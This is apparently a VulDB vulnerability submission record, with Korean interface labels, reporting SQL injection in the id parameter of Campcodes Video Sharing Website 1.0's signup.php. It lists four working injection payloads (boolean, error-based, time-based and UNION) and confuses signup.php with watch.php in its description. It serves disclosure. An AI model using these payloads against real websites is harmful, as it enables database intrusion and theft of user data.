| 제목 | SQL injection vulnerability exists in Video Sharing Website |
|---|
| 설명 | SQL injection vulnerability exists in id parameter of signup.php file of Video Sharing Website
Important user data or system data may be leaked and system security may be compromised
The environment is secure and the information can be used by malicious users.
When visit index.php and page parameter is ‘watch’,it will include watch.php,and id parameter can do sql injection.
Payload:
id=4/(3*2-5) AND 6049=6049&page=signup
or
id=(SELECT 3638 FROM(SELECT COUNT(*),CONCAT(0x716a787071,(SELECT (ELT(3638=3638,1))),0x71706a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)&page=signup
or
id=4/(3*2-5) AND (SELECT 3130 FROM (SELECT(SLEEP(5)))puzr)&page=signup
or
id=-8745 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a787071,0x727a724e6745556d4849654c546d766f6b4645526f78706a4877484d6e75696e4e50444f5271645a,0x71706a7a71),NULL,NULL,NULL-- -&page=signup |
|---|
| 원천 | ⚠️ https://github.com/E1CHO/cve_hub/blob/main/Video%20Sharing%20Website/Video%20Sharing%20Website%20vuln%203.pdf |
|---|
| 사용자 | SSL_Seven_Security Lab_WangZhiQiang_ZhangYing (UID 41874) |
|---|
| 제출 | 2023. 04. 14. AM 06:10 (3 연령 ago) |
|---|
| 모더레이션 | 2023. 04. 14. AM 08:21 (2 hours later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 225913 [Campcodes Video Sharing Website 1.0 signup.php 아이디 SQL 주입] |
|---|
| 포인트들 | 20 |
|---|